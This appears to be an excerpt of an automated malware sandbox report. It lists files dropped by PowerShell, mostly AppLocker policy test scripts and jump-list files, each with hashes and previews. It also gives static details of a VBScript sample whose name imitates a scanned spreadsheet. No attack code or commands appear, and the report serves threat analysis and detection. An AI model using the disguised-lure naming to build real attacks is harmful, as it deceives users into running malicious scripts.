                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_355wyowr.4mh.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pcgnwal.lvb.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0eo2lqc.ea3.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eey4aeiy.epi.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5wbr03l.bzg.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbf1cixn.r34.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1snccbb.02v.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_myjq1qrj.ckp.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onctug1l.lnb.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opy1veih.brh.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwmwqtex.1du.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyh0zagw.m52.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjtezlof.q34.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1fvvhl3.z1m.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xpefziyl.pxn.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2cdge2y.spg.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkygwrx3.tlf.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwtczm4x.b0s.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.728944119173072
                                Encrypted:false
                                SSDEEP:48:K+DrlAtYf3CyGU2UphukvhkvklCywn0v+xLlHJZSogZoXUv+xLlLZSogZo71:njf3C0TGkvhkvCCt0WxLMHfWxLaHY
                                MD5:DA76809664DC3216A3E66BCBC985C45E
                                SHA1:DF54E7B02258490AFC5A740FADDF898247F6967D
                                SHA-256:932D1EAB4DADE9F6E097BD16C29EE03E8FC93345D0D5941918F2C5817C1500F1
                                SHA-512:BDDB4D1FD32D9B06F4D1D584F3C8A2FD4C010BCB3625331F1751CFBB2524C8D87493055D92EAF851BA4BA0A418A1B1BCBD80E00C7C5B01C94B88B4C7F1CCE5BC
                                Malicious:false
                                Preview:...................................FL..................F.".. ...J.S.....}.T...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....;.e.......e.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CY.;...........................^.A.p.p.D.a.t.a...B.V.1.....CY|;..Roaming.@......EW<2CY|;..../...................... ..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2CYy;....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2CYy;....2......................0#.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2CYy;....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2CYy;....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2EWk3....u...........

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF59e29e.TMP (copy)

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.728944119173072
                                Encrypted:false
                                SSDEEP:48:K+DrlAtYf3CyGU2UphukvhkvklCywn0v+xLlHJZSogZoXUv+xLlLZSogZo71:njf3C0TGkvhkvCCt0WxLMHfWxLaHY
                                MD5:DA76809664DC3216A3E66BCBC985C45E
                                SHA1:DF54E7B02258490AFC5A740FADDF898247F6967D
                                SHA-256:932D1EAB4DADE9F6E097BD16C29EE03E8FC93345D0D5941918F2C5817C1500F1
                                SHA-512:BDDB4D1FD32D9B06F4D1D584F3C8A2FD4C010BCB3625331F1751CFBB2524C8D87493055D92EAF851BA4BA0A418A1B1BCBD80E00C7C5B01C94B88B4C7F1CCE5BC
                                Malicious:false
                                Preview:...................................FL..................F.".. ...J.S.....}.T...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....;.e.......e.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CY.;...........................^.A.p.p.D.a.t.a...B.V.1.....CY|;..Roaming.@......EW<2CY|;..../...................... ..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2CYy;....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2CYy;....2......................0#.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2CYy;....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2CYy;....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2EWk3....u...........

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF59ff5e.TMP (copy)

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.728944119173072
                                Encrypted:false
                                SSDEEP:48:K+DrlAtYf3CyGU2UphukvhkvklCywn0v+xLlHJZSogZoXUv+xLlLZSogZo71:njf3C0TGkvhkvCCt0WxLMHfWxLaHY
                                MD5:DA76809664DC3216A3E66BCBC985C45E
                                SHA1:DF54E7B02258490AFC5A740FADDF898247F6967D
                                SHA-256:932D1EAB4DADE9F6E097BD16C29EE03E8FC93345D0D5941918F2C5817C1500F1
                                SHA-512:BDDB4D1FD32D9B06F4D1D584F3C8A2FD4C010BCB3625331F1751CFBB2524C8D87493055D92EAF851BA4BA0A418A1B1BCBD80E00C7C5B01C94B88B4C7F1CCE5BC
                                Malicious:false
                                Preview:...................................FL..................F.".. ...J.S.....}.T...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....;.e.......e.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CY.;...........................^.A.p.p.D.a.t.a...B.V.1.....CY|;..Roaming.@......EW<2CY|;..../...................... ..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2CYy;....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2CYy;....2......................0#.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2CYy;....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2CYy;....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2EWk3....u...........

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZB6AP7T5JPLHVE0MPFL.temp

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.728944119173072
                                Encrypted:false
                                SSDEEP:48:K+DrlAtYf3CyGU2UphukvhkvklCywn0v+xLlHJZSogZoXUv+xLlLZSogZo71:njf3C0TGkvhkvCCt0WxLMHfWxLaHY
                                MD5:DA76809664DC3216A3E66BCBC985C45E
                                SHA1:DF54E7B02258490AFC5A740FADDF898247F6967D
                                SHA-256:932D1EAB4DADE9F6E097BD16C29EE03E8FC93345D0D5941918F2C5817C1500F1
                                SHA-512:BDDB4D1FD32D9B06F4D1D584F3C8A2FD4C010BCB3625331F1751CFBB2524C8D87493055D92EAF851BA4BA0A418A1B1BCBD80E00C7C5B01C94B88B4C7F1CCE5BC
                                Malicious:false
                                Preview:...................................FL..................F.".. ...J.S.....}.T...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....;.e.......e.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CY.;...........................^.A.p.p.D.a.t.a...B.V.1.....CY|;..Roaming.@......EW<2CY|;..../...................... ..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2CYy;....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2CYy;....2......................0#.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2CYy;....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2CYy;....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2EWk3....u...........

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EQE4R152POI5BP6PSOXQ.temp

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.7283641905307636
                                Encrypted:false
                                SSDEEP:48:v5jDrlAtYf3CyGU2kDhukvhkvklCywn0v+xLlLZSogZoXUv+xLlLZSogZo71:vdjf3C0nMkvhkvCCt0WxLaHfWxLaHY
                                MD5:80F1E81DEDFC65944A9FFDCF948DB96E
                                SHA1:8BCDBEF4A597E07ABCD804EA122346F35C76C056
                                SHA-256:2F96E3E0FB00CB5F9BBFBB83795AF27B306090C63579104472E672D4FFDED520
                                SHA-512:CD04AE932581F208315B5C0CDE35F27D316E698963C3B1D75E291D1F0654EE97318ECBFBB6CF80E4AC668297522879F8FEBE44FF75C58EA103240EDCA8D65FE4
                                Malicious:false
                                Preview:...................................FL..................F.".. ...J.S....@..e...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....;.e....z4.e.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CY.;...........................^.A.p.p.D.a.t.a...B.V.1.....CY|;..Roaming.@......EW<2CY|;..../...................... ..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2CYy;....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2CYy;....2......................0#.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2CYy;....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2CYy;....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2CY.;....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2CY.;....u...........

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EYVYE2PL7JSJ5UM1S0CP.temp

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.7287587846258963
                                Encrypted:false
                                SSDEEP:48:v5jDrlAtYf3CyGU2kDhukvhkvklCywn0v+xLlLZSogZoXUv+xLlLZSogZo71:v1jf3C0nMkvhkvCCt0WxLaHfWxLaHY
                                MD5:F6251D80387BE0C30B3F6BECA8BDC298
                                SHA1:AC92704641DF5A8B8339A2A8CE7A65DF9A9D5E8C
                                SHA-256:E53BE53663DDB58AE47FA4A854476FEA764041CE0968917E0E83D07A02E25CD3
                                SHA-512:8F7FB2AD9E3A0DA74C15FF29C8CF075938C704ECF2E900CAA7C9F6DB86B028708977BB6F2B398F8BC2865DAFF1B91CB44B24C0F3AA0D7D18CB626F20090CB366
                                Malicious:false
                                Preview:...................................FL..................F.".. ...J.S....@..e...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....;.e.......e.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CY.;...........................^.A.p.p.D.a.t.a...B.V.1.....CY|;..Roaming.@......EW<2CY|;..../...................... ..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2CYy;....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2CYy;....2......................0#.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2CYy;....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2CYy;....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2CY.;....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2CY.;....u...........

                                Static File Info

                                General

                                File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Entropy (8bit):3.493842135590996
                                TrID:
                                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                • MP3 audio (1001/1) 32.22%
                                • Lumena CEL bitmap (63/63) 2.03%
                                • Corel Photo Paint (41/41) 1.32%
                                File name:SKMBT_77122012816310TD0128_17311_XLS.vbs
                                File size:605'916 bytes
                                MD5:9b36a3c24abb6bc8694e48e0c101c416
                                SHA1:6fd1c1c65d63f349734f2efcce64c88b3efd5e45
                                SHA256:7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15
                                SHA512:e22e5725ff50239c8df0ea9010ea389bdd79392dbcf01d65c9af5a32fd0084f501db879fcee5dfee0a2d02c9626d7d8f61abb240189d9fcf6ae00b1602298f64
